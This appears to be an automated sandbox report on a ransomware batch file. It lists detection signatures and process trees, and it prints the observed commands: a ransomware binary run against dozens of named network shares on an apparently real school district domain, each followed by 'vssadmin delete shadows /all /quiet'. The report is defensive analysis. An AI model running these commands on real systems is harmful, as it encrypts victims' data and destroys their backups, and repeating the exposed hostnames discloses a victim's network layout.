4568f9dd1dc8fd256524e78f1d32d009eb0d5acbdc1a9d9507287832808e50e9

Resubmissions

07-02-2023 21:14

230207-z3l7zsfa9w 10

07-02-2023 21:10

230207-z1fx7aff86 10

04-02-2023 03:46

230204-ebzc1sff9s 10

Analysis

max time kernel
194s
max time network
34s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
04-02-2023 03:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.bat
Size

7KB
MD5

e0958318a44912e90bb2cd8729cfc9cb
SHA1

00ea479c600bb4e8fb47dfd284518248cbed51db
SHA256

68b1bf6dfcb95c273cf203194083b786a38ae6180a5ea4f9eb030563ddaf851a
SHA512

46d0873c2bbe6c4f6fc50a04a11baf56f4322e12a0f374005ca60c904fd5ee573b9aa44f4657f9f080cec856f98800f48e6acebe333b9d53491419e4cb15449c
SSDEEP

192:991l1D1b1s1Q13161V141e101e121r1R191j11181m1f1RW1X12W1w1c1z1q1N1A:9DbBJ8QF6LIeUemZnDhrMW90l3wsxqTA

Score

9^/10

ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Interacts with shadow copies 2 TTPs 64 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2944	vssadmin.exe
1080	vssadmin.exe
1568	vssadmin.exe
2764	vssadmin.exe
2928	vssadmin.exe
2712	vssadmin.exe
1504	vssadmin.exe
560	vssadmin.exe
1708	vssadmin.exe
3068	vssadmin.exe
2400	vssadmin.exe
2700	vssadmin.exe
1416	vssadmin.exe
676	vssadmin.exe
436	vssadmin.exe
636	vssadmin.exe
3004	vssadmin.exe
1700	vssadmin.exe
2456	vssadmin.exe
1252	vssadmin.exe
1484	vssadmin.exe
2864	vssadmin.exe
2776	vssadmin.exe
2992	vssadmin.exe
2424	vssadmin.exe
2988	vssadmin.exe
852	vssadmin.exe
1964	vssadmin.exe
2896	vssadmin.exe
2440	vssadmin.exe
2704	vssadmin.exe
1876	vssadmin.exe
2836	vssadmin.exe
1472	vssadmin.exe
2768	vssadmin.exe
2960	vssadmin.exe
2056	vssadmin.exe
2644	vssadmin.exe
2948	vssadmin.exe
2556	vssadmin.exe
2872	vssadmin.exe
1280	vssadmin.exe
2056	vssadmin.exe
3016	vssadmin.exe
1044	vssadmin.exe
2436	vssadmin.exe
1252	vssadmin.exe
2700	vssadmin.exe
560	vssadmin.exe
2924	vssadmin.exe
2668	vssadmin.exe
2400	vssadmin.exe
2272	vssadmin.exe
1340	vssadmin.exe
648	vssadmin.exe
2580	vssadmin.exe
524	vssadmin.exe
2376	vssadmin.exe
2612	vssadmin.exe
2940	vssadmin.exe
2864	vssadmin.exe
2648	vssadmin.exe
2108	vssadmin.exe
2024	vssadmin.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs

Processes:

1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe1.exe

pid	process
524	1.exe
1488	1.exe
1044	1.exe
1480	1.exe
880	1.exe
1700	1.exe
292	1.exe
1920	1.exe
908	1.exe
436	1.exe
1340	1.exe
1736	1.exe
772	1.exe
944	1.exe
1132	1.exe
1632	1.exe
1704	1.exe
1268	1.exe
1448	1.exe
1520	1.exe
1748	1.exe
1936	1.exe
1676	1.exe
748	1.exe
1184	1.exe
1212	1.exe
1440	1.exe
364	1.exe
1500	1.exe
576	1.exe
332	1.exe
1600	1.exe
1588	1.exe
684	1.exe
760	1.exe
1968	1.exe
1048	1.exe
2012	1.exe
964	1.exe
1572	1.exe
956	1.exe
1056	1.exe
1916	1.exe
888	1.exe
316	1.exe
1980	1.exe
2068	1.exe
2100	1.exe
2116	1.exe
2128	1.exe
2140	1.exe
2172	1.exe
2188	1.exe
2208	1.exe
2224	1.exe
2244	1.exe
2256	1.exe
2276	1.exe
2288	1.exe
2308	1.exe
2324	1.exe
2336	1.exe
2344	1.exe
2352	1.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

vssvc.exe

description pid process

Token: SeBackupPrivilege 2084 vssvc.exe
Token: SeRestorePrivilege 2084 vssvc.exe
Token: SeAuditPrivilege 2084 vssvc.exe

description	pid	process
Token: SeBackupPrivilege	2084	vssvc.exe
Token: SeRestorePrivilege	2084	vssvc.exe
Token: SeAuditPrivilege	2084	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1248 wrote to memory of 524	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 524	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 524	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 524	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1488	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1488	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1488	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1488	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1044	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1044	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1044	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1044	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1480	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1480	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1480	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1480	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 880	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 880	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 880	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 880	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1700	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1700	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1700	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1700	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 292	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 292	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 292	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 292	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1920	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1920	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1920	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1920	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 908	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 908	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 908	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 908	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 436	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 436	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 436	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 436	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1340	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1340	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1340	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1340	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1736	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1736	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1736	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1736	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 772	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 772	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 772	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 772	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 944	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 944	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 944	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 944	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1132	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1132	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1132	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1132	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1632	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1632	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1632	1248	cmd.exe	1.exe
PID 1248 wrote to memory of 1632	1248	cmd.exe	1.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1248

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CPS-NUTRIKIDS.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:524

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2436

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS21.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1488

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1504

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NES-NUTRIKIDS.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1044

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:648

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM05.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1480

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2024

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS51.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:880

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2424

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NES-ELLDIR.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1700

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1252

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CENTRAL-PAZJLAP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:292

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:1508

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:908

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\JOANNE-LAP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1920

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1484

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:436

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1876

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\F$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1340

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2400

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4300.IN.NPS.K12.MA.US\H$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1736

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2944

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CPS-VICE-PRINC.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:772

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2960

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\GROUNDS-JP-LAP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:944

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2836

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-DIRFACILITIES.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1132

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2972

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CENTRAL-VB.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1632

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2376

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-FOODMANGER.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1704

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2644

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\CENTRAL-ESP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1268

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2700

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\ERICHENS-NES.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1448

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2056

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-JP-CAMERAPC.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1520

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4000.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1748

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2580

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4000.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1936

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1252

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPSDL4000.IN.NPS.K12.MA.US\E$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1676

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:748

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3068

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\E$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1184

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:524

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PaperCut" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1212

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2988

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PCClient" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1440

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1568

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PCDirectPrintMonitor" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:364

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1080

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\PCRelease" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1500

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:852

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\SCHOLARSHIPS" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:332

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1964

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\Time Xpress" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1600

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2776

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\NES-Lib-Lab" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1588

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2556

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\Photos" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:576

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:560

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\NHS001ATechHP" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:684

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2764

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM01.IN.NPS.K12.MA.US\RicohPrinters" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:760

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1472

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISPOS.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1968

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2700

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1048

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2864

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2012

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2108

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Groups$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:964

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2872

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\NESUser$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1572

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y18$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:956

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2768

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y19$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1056

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2928

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y20$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1916

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3004

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y21$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:888

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2896

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y22$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:316

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2948

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y23$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1980

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:832

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y24$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2068

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1708

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y25$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2100

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2612

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y26$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2116

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2760

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y27$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2128

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
